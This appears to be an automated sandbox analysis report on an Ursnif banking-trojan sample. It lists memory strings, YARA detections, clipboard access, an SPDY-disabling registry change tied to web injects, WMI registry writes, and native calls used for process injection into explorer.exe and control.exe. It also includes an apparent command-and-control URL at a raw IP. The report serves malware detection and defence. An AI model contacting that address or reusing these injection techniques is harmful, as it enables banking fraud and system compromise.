Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: http://ocsp.sectigo.com0
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.4.dr String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.4.dr String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.4.dr String found in binary or memory: http://www.wikipedia.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.4.dr String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000025.00000000.459469770.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp String found in binary or memory: https://185.156.172.54/images/TMwZ54mn/_2B0YUdRavAKwwypVOfrYnt/6W6xbFFdug/RuY3cr5ZWBeuRUS61/qsMNDxm8
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001C.00000002.477701499.0000022490BF0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001C.00000002.495468052.00000224A0A41000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 5fd9d7ec9e7aetar.dll String found in binary or memory: https://sectigo.com/CPS0D
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Contains functionality to read the clipboard data
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100181C0 EntryPoint,DestroyCursor,CreateMetaFileA,CloseFigure,AbortPath,DestroyCursor,GetMapMode,CharUpperW,OpenIcon,CharNextA,GdiGetBatchLimit,GetClipboardOwner,IsGUIThread,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardDa
ta,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData,GetClipboardData, 0_2_100181C0
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.457120886.000000000153B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01511ADC GetLastError,NtClose, 0_2_01511ADC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01511A34 GetProcAddress,NtCreateSection,memset, 0_2_01511A34
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015110BA NtMapViewOfSection, 0_2_015110BA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015123F5 NtQueryVirtualMemory, 0_2_015123F5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F679B3 NtMapViewOfSection, 0_2_02F679B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F671B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_02F671B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F67B01 GetProcAddress,NtCreateSection,memset, 0_2_02F67B01
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F6B2FD NtQueryVirtualMemory, 0_2_02F6B2FD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess, 0_2_0122B780
Source: C:\Windows\explorer.exe Code function: 37_2_03B623A4 NtQueryInformationProcess, 37_2_03B623A4
Source: C:\Windows\explorer.exe Code function: 37_2_03B613A8 NtMapViewOfSection, 37_2_03B613A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B58790 NtCreateSection, 37_2_03B58790
Source: C:\Windows\explorer.exe Code function: 37_2_03B60BE8 NtReadVirtualMemory, 37_2_03B60BE8
Source: C:\Windows\explorer.exe Code function: 37_2_03B52710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 37_2_03B52710
Source: C:\Windows\explorer.exe Code function: 37_2_03B672AC NtWriteVirtualMemory, 37_2_03B672AC
Source: C:\Windows\explorer.exe Code function: 37_2_03B68208 RtlAllocateHeap,NtQueryInformationProcess, 37_2_03B68208
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 37_2_03B76A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B62DC4 NtQueryInformationProcess, 37_2_03B62DC4
Source: C:\Windows\explorer.exe Code function: 37_2_03B710A0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 37_2_03B710A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B6F0C0 NtAllocateVirtualMemory, 37_2_03B6F0C0
Source: C:\Windows\explorer.exe Code function: 37_2_03B68800 NtQuerySystemInformation, 37_2_03B68800
Source: C:\Windows\explorer.exe Code function: 37_2_03B8A004 NtProtectVirtualMemory,NtProtectVirtualMemory, 37_2_03B8A004
Source: C:\Windows\System32\control.exe Code function: 38_2_009C10A0 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_009C10A0
Source: C:\Windows\System32\control.exe Code function: 38_2_009BF0C0 NtAllocateVirtualMemory, 38_2_009BF0C0
Source: C:\Windows\System32\control.exe Code function: 38_2_009B72AC NtWriteVirtualMemory, 38_2_009B72AC
Source: C:\Windows\System32\control.exe Code function: 38_2_009B8208 NtQueryInformationProcess, 38_2_009B8208
Source: C:\Windows\System32\control.exe Code function: 38_2_009C6A5C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_009C6A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009A8790 NtCreateSection, 38_2_009A8790
Source: C:\Windows\System32\control.exe Code function: 38_2_009B13A8 NtMapViewOfSection, 38_2_009B13A8
Source: C:\Windows\System32\control.exe Code function: 38_2_009B23A4 NtQueryInformationProcess, 38_2_009B23A4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B0BE8 NtReadVirtualMemory, 38_2_009B0BE8
Source: C:\Windows\System32\control.exe Code function: 38_2_009A2710 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_009A2710
Source: C:\Windows\System32\control.exe Code function: 38_2_009DA004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_009DA004
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_015121D4 0_2_015121D4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100014EE 0_2_100014EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100012F1 0_2_100012F1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000155A 0_2_1000155A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100037DC 0_2_100037DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F6B0DC 0_2_02F6B0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F65920 0_2_02F65920
Source: C:\Windows\explorer.exe Code function: 37_2_03B5E2F0 37_2_03B5E2F0
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F204 37_2_03B5F204
Source: C:\Windows\explorer.exe Code function: 37_2_03B76A5C 37_2_03B76A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B5BD6C 37_2_03B5BD6C
Source: C:\Windows\explorer.exe Code function: 37_2_03B5F8AC 37_2_03B5F8AC
Source: C:\Windows\explorer.exe Code function: 37_2_03B79494 37_2_03B79494
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C0C0 37_2_03B5C0C0
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B6A054 37_2_03B6A054
Source: C:\Windows\explorer.exe Code function: 37_2_03B6D3A0 37_2_03B6D3A0
Source: C:\Windows\explorer.exe Code function: 37_2_03B57FCC 37_2_03B57FCC
Source: C:\Windows\explorer.exe Code function: 37_2_03B78320 37_2_03B78320
Source: C:\Windows\explorer.exe Code function: 37_2_03B78B18 37_2_03B78B18
Source: C:\Windows\explorer.exe Code function: 37_2_03B52F0C 37_2_03B52F0C
Source: C:\Windows\explorer.exe Code function: 37_2_03B54E94 37_2_03B54E94
Source: C:\Windows\explorer.exe Code function: 37_2_03B74290 37_2_03B74290
Source: C:\Windows\explorer.exe Code function: 37_2_03B5DEF0 37_2_03B5DEF0
Source: C:\Windows\explorer.exe Code function: 37_2_03B51EFC 37_2_03B51EFC
Source: C:\Windows\explorer.exe Code function: 37_2_03B66A34 37_2_03B66A34
Source: C:\Windows\explorer.exe Code function: 37_2_03B7062C 37_2_03B7062C
Source: C:\Windows\explorer.exe Code function: 37_2_03B6B210 37_2_03B6B210
Source: C:\Windows\explorer.exe Code function: 37_2_03B5AA50 37_2_03B5AA50
Source: C:\Windows\explorer.exe Code function: 37_2_03B77A5C 37_2_03B77A5C
Source: C:\Windows\explorer.exe Code function: 37_2_03B5CE44 37_2_03B5CE44
Source: C:\Windows\explorer.exe Code function: 37_2_03B595A8 37_2_03B595A8
Source: C:\Windows\explorer.exe Code function: 37_2_03B619D4 37_2_03B619D4
Source: C:\Windows\explorer.exe Code function: 37_2_03B5C9D0 37_2_03B5C9D0
Source: C:\Windows\explorer.exe Code function: 37_2_03B68D74 37_2_03B68D74
Source: C:\Windows\explorer.exe Code function: 37_2_03B70C88 37_2_03B70C88
Source: C:\Windows\explorer.exe Code function: 37_2_03B560E4 37_2_03B560E4
Source: C:\Windows\explorer.exe Code function: 37_2_03B6DCE4 37_2_03B6DCE4
Source: C:\Windows\explorer.exe Code function: 37_2_03B548E8 37_2_03B548E8
Source: C:\Windows\explorer.exe Code function: 37_2_03B65030 37_2_03B65030
Source: C:\Windows\System32\control.exe Code function: 38_2_009AF8AC 38_2_009AF8AC
Source: C:\Windows\System32\control.exe Code function: 38_2_009AE2F0 38_2_009AE2F0
Source: C:\Windows\System32\control.exe Code function: 38_2_009C6A5C 38_2_009C6A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C9494 38_2_009C9494
Source: C:\Windows\System32\control.exe Code function: 38_2_009C0C88 38_2_009C0C88
Source: C:\Windows\System32\control.exe Code function: 38_2_009AC0C0 38_2_009AC0C0
Source: C:\Windows\System32\control.exe Code function: 38_2_009A48E8 38_2_009A48E8
Source: C:\Windows\System32\control.exe Code function: 38_2_009A60E4 38_2_009A60E4
Source: C:\Windows\System32\control.exe Code function: 38_2_009BDCE4 38_2_009BDCE4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B5030 38_2_009B5030
Source: C:\Windows\System32\control.exe Code function: 38_2_009B0C34 38_2_009B0C34
Source: C:\Windows\System32\control.exe Code function: 38_2_009BA054 38_2_009BA054
Source: C:\Windows\System32\control.exe Code function: 38_2_009C0180 38_2_009C0180
Source: C:\Windows\System32\control.exe Code function: 38_2_009A95A8 38_2_009A95A8
Source: C:\Windows\System32\control.exe Code function: 38_2_009AC9D0 38_2_009AC9D0
Source: C:\Windows\System32\control.exe Code function: 38_2_009B19D4 38_2_009B19D4
Source: C:\Windows\System32\control.exe Code function: 38_2_009B8D74 38_2_009B8D74
Source: C:\Windows\System32\control.exe Code function: 38_2_009ABD6C 38_2_009ABD6C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C4290 38_2_009C4290
Source: C:\Windows\System32\control.exe Code function: 38_2_009A4E94 38_2_009A4E94
Source: C:\Windows\System32\control.exe Code function: 38_2_009A1EFC 38_2_009A1EFC
Source: C:\Windows\System32\control.exe Code function: 38_2_009ADEF0 38_2_009ADEF0
Source: C:\Windows\System32\control.exe Code function: 38_2_009BB210 38_2_009BB210
Source: C:\Windows\System32\control.exe Code function: 38_2_009AF204 38_2_009AF204
Source: C:\Windows\System32\control.exe Code function: 38_2_009B6A34 38_2_009B6A34
Source: C:\Windows\System32\control.exe Code function: 38_2_009C062C 38_2_009C062C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C7A5C 38_2_009C7A5C
Source: C:\Windows\System32\control.exe Code function: 38_2_009AAA50 38_2_009AAA50
Source: C:\Windows\System32\control.exe Code function: 38_2_009ACE44 38_2_009ACE44
Source: C:\Windows\System32\control.exe Code function: 38_2_009BD3A0 38_2_009BD3A0
Source: C:\Windows\System32\control.exe Code function: 38_2_009A7FCC 38_2_009A7FCC
Source: C:\Windows\System32\control.exe Code function: 38_2_009C8B18 38_2_009C8B18
